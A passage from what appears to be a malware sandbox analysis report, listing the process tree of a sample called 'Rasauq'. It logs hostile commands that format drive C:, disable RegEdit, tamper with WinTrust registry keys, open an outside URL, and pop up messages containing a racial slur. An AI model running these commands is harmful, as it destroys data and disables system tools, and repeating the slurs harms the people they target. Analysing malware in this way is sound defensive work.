      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:4664
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:860
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:2496
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:5528
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:1908
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3916
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3700
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:4104
  - - C:\Windows\system32\reg.exe
      reg add "End of search: 20 match(es) found.\Software\Rasauq on top" /f
      4⤵
      PID:4220
  - - C:\Windows\system32\msg.exe
      msg * /time:3 "This machine has been compromised by Rasuaq"
      4⤵
      PID:2976
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn-cf-east.streamable.com/video/mp4/j3mt4w.mp4?Expires=1742467040071
      4⤵
      Drops file in Windows directory
      Enumerates system info in registry
      Modifies registry class
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:3708
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x34c,0x7ffac08ef208,0x7ffac08ef214,0x7ffac08ef220
        5⤵
        
        PID:1640
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1880,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=2152 /prefetch:11
        5⤵
        
        PID:1468
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2116,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=2112 /prefetch:2
        5⤵
        
        PID:5368
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2480,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=2688 /prefetch:13
        5⤵
        
        PID:1696
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3416,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=3500 /prefetch:1
        5⤵
        
        PID:304
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3424,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=3504 /prefetch:1
        5⤵
        
        PID:948
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4764,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=4928 /prefetch:14
        5⤵
        
        PID:5444
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4612,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=4912 /prefetch:14
        5⤵
        
        PID:1996
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=5456,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=5488 /prefetch:1
        5⤵
        
        PID:2628
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5780,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=5792 /prefetch:14
        5⤵
        
        PID:6108
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6108,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=6076 /prefetch:14
        5⤵
        
        PID:1436
      - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
        
        cookie_exporter.exe --cookie-json=1128
        6⤵
        
        PID:5612
    - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5516,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=5876 /prefetch:14
        5⤵
        
        PID:1288
    - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5516,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=5876 /prefetch:14
        5⤵
        
        PID:3428
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=4164,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=6472 /prefetch:1
        5⤵
        
        PID:4224
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=6544,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=6628 /prefetch:1
        5⤵
        
        PID:872
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=6612,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=6800 /prefetch:1
        5⤵
        
        PID:4180
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6944,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=6976 /prefetch:1
        5⤵
        
        PID:5704
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=6180,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=7144 /prefetch:1
        5⤵
        
        PID:4536
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=6556,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=7188 /prefetch:1
        5⤵
        
        PID:5828
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=7564,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=7584 /prefetch:1
        5⤵
        
        PID:2544
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=7652,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=7492 /prefetch:1
        5⤵
        
        PID:5600
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --always-read-main-dll --field-trial-handle=7852,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=7832 /prefetch:1
        5⤵
        
        PID:4420
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=7992,i,8793078512878562298,7802291194819010346,262144 --variations-seed-version --mojo-platform-channel-handle=8028 /prefetch:1
        5⤵
        
        PID:3512
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
        5⤵
        
        PID:2500
  - - C:\Windows\system32\timeout.exe
      timeout /t 10 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3088
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
      4⤵
      Disables RegEdit via registry modification
      PID:3740
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5108
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1252
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4152
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5476
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3704
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3696
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4668
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:2268
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:2272
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:4240
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:2132
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4000
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4656
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5436
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:544
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2028
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1032
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3512
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:780
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:3180
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:5108
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:3704
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3804
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:484
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5320
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5284
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4268
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2708
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5936
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:5468
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:2976
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:4068
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:1480
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:1064
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4196
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2336
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4868
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3168
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1900
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:740
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:3608
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:4708
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:2556
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:4696
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:1076
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4372
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3504
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2324
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1628
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5948
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2940
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:4124
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:1860
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:3172
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:5292
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:2908
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5464
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6064
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6008
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4524
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      Drops file in Windows directory
      Enumerates system info in registry
      Modifies registry class
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:4456
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x36c,0x7ffac08ef208,0x7ffac08ef214,0x7ffac08ef220
        5⤵
        
        PID:5292
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1784,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=2564 /prefetch:11
        5⤵
        
        PID:2448
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2536,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=2532 /prefetch:2
        5⤵
        
        PID:2268
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2092,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=2580 /prefetch:13
        5⤵
        
        PID:4900
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3404,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=3448 /prefetch:1
        5⤵
        
        PID:4400
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3412,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=3700 /prefetch:1
        5⤵
        
        PID:3920
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4216,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=4236 /prefetch:1
        5⤵
        
        PID:1996
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=5024,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=5008 /prefetch:1
        5⤵
        
        PID:1964
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=5224,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=5244 /prefetch:1
        5⤵
        
        PID:3120
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=5404,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=5420 /prefetch:1
        5⤵
        
        PID:4104
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=5628,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=5636 /prefetch:1
        5⤵
        
        PID:5956
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=5788,i,1238580262108531247,16255690695572939139,262144 --variations-seed-version --mojo-platform-channel-handle=5800 /prefetch:1
        5⤵
        
        PID:4028
